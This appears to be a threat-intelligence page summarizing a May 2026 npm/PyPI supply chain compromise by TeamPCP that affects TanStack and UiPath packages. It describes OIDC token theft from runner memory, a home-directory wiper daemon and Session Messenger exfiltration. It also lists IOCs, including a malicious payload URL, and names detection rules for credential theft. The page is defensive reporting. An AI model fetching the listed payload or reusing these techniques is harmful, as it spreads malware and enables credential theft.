TeamPCP Strikes Again: TanStack, UiPath & npm Supply Chain Compromise with Wiper Daemon
Source report →Wiz documented a coordinated supply chain attack launched by TeamPCP (Mini Shai-Hulud) on May 11, 2026, compromising 89 npm packages and two PyPI packages spanning developer tooling, enterprise automation, and AI namespaces. The npm package @tanstack/react-router alone accounts for approximately 12 million weekly downloads. The campaign builds on the preinstall-hook/Bun execution chain used in prior TeamPCP waves and adds a novel GitHub Actions vector that extracts OIDC tokens directly from runner process memory, bypassing environment-variable secret masking entirely.
The payload steals credentials from developer machines and CI/CD pipelines, including, for the first time, password vault data, and self-propagates by publishing poisoned versions of the victim's own npm packages. A novel persistence daemon wipes the user's home directory if the stolen GitHub token is revoked, so teams should remove it before rotating credentials. The Python variant adds geographic targeting: on systems with timezone or language settings indicating Israel or Iran, it rolls a random value between 1 and 6 and if it lands on 2, plays an MP3 file at full volume and attempts to delete all files in the home directory. Exfiltration uses three redundant channels, including the decentralized Session Messenger network not seen in prior TeamPCP campaigns.
IOCs (20)
Scan your environment for IOCs →SHA256 FILE HASH 4
ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c2ec78d556d696e208927cc503d48e4b5eb56b31abc2870c2ed2e98d6be27fc962258284d65f63829bd67eaba01ef6f1ada2f593f9bbe41678b2df360bd90d3df1e8538c6e0563d50da0f2e097e979ebd5294ce1defe01d0b9fe361ba3bed1898SHA1 FILE HASH 2
e7d582b98ca80690883175470e96f703ef6dc49712f35b1081b17d21815b35feb57ab03d02482116DOMAIN 5
git-tanstack.comseed1.getsession.orgseed2.getsession.orgseed3.getsession.orgfilev2.getsession.orgIP ADDRESS 1
83.142.209.194URL 1
https://git-tanstack.com/tmp/transformers.pyzFILE NAME 7
router_init.jssetup.mjsrouter_runtime.jstanstack_runner.jsgh-token-monitor~/Library/LaunchAgents/com.user.gh-token-monitor.plist~/.config/systemd/user/gh-token-monitor.serviceDetections (10)
Enable detections →Connect your environment for suggestions and queries personalized to your security telemetry.
- npm Node Lifecycle Hook Spawning Download Utility to Fetch Bun Runtime
- npm Lifecycle Script Executing Malicious Payload via Bun Runtime
- IDE or AI Coding Assistant Persistence Backdoor Execution
- Token Revocation Home Directory Wipe
- GitHub Actions Cache Poisoning via pull_request_target with OIDC Token Extraction from Runner Memory
- GitHub Repository Created with Campaign-Specific Description Marker
- Session Messenger (getsession.org) C2 Exfiltration — Outbound Connections from Developer Tooling
- Self-Propagating Worm — npm Package Published via Stolen Registry Token
- Python Payload Download from Typosquat Domain via pip or Direct HTTP Fetch